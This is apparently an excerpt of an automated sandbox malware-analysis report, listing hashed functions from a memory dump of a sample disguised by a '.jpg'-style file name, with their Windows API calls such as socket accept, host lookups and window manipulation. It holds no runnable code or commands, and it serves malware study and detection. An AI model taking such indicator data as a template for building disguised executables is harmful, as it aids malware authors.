                                                                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1792727568-0
                                                                                                          • Opcode ID: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
                                                                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                          • Opcode Fuzzy Hash: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
                                                                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                          APIs
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                          • String ID:
                                                                                                          • API String ID: 2169480361-0
                                                                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                          APIs
                                                                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                          • String ID: cdecl
                                                                                                          • API String ID: 3850814276-3896280584
                                                                                                          • Opcode ID: 3ef78af3aca15c91cacd853d03b8f67cf07cd8e3b86173aa1d6b869a3aeb5740
                                                                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                          • Opcode Fuzzy Hash: 3ef78af3aca15c91cacd853d03b8f67cf07cd8e3b86173aa1d6b869a3aeb5740
                                                                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                          • _memmove.LIBCMT ref: 0046D475
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 2502553879-0
                                                                                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32 ref: 00448C69
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 312131281-0
                                                                                                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                          APIs
                                                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastacceptselect
                                                                                                          • String ID:
                                                                                                          • API String ID: 385091864-0
                                                                                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1358664141-0
                                                                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2880819207-0
                                                                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187119602-0
                                                                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1597257046-0
                                                                                                          • Opcode ID: fe99bc0697cc33711826f116b96e18735b0e4b86babd17bf6afeb386559a81e1
                                                                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                          • Opcode Fuzzy Hash: fe99bc0697cc33711826f116b96e18735b0e4b86babd17bf6afeb386559a81e1
                                                                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 237123855-0
                                                                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
